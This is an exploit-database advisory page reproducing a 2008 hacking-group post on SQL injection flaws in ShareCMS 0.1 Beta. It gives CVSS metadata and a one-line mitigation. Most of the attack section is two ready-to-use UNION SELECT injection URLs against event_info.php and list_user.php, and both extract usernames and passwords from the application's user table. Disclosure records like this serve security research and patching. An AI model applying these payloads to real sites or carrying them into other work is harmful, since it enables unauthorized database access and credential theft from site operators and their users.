ShareCMS 0.1 Multiple Remote SQL Injection Vulnerabilities

vendor:

ShareCMS

by:

CWH Underground

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: ShareCMS

Affected Version From: 0.1 Beta

Affected Version To: 0.1 Beta

Patch Exists: NO

Related CWE: N/A

CPE: a:sharecms:sharecms:0.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

ShareCMS 0.1 Multiple Remote SQL Injection Vulnerabilities

ShareCMS 0.1 is vulnerable to multiple remote SQL injection vulnerabilities. An attacker can exploit these vulnerabilities to gain access to sensitive information such as usernames and passwords stored in the database.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

==============================================================
  ShareCMS 0.1 Multiple Remote SQL Injection Vulnerabilities
==============================================================
 
  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 24 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : ShareCMS 
 VERSION     : 0.1 Beta
 VENDOR      : N/A
 DOWNLOAD    : http://downloads.sourceforge.net/sharecms
#####################################################

--- Remote SQL Injection ---

----------
 Exploits
----------

[+] http://[Target]/[sharecms_path]/event_info.php?eventID[SQL Injection]
[+] http://[Target]/[sharecms_path]/list_user.php?userID=[SQL Injection]

--------------
 POC Exploits
--------------

[+] http://192.168.24.25/sharecms/event_info.php?eventID=-9999/**/UNION/**/SELECT/**/1,2,3,username,5,6,7,8,9,10,11,12,password/**/FROM/**/user--
[+] http://192.168.24.25/sharecms/list_user.php?userID=-9999/**/UNION/**/SELECT/**/1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11/**/FROM/**/user--


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-24]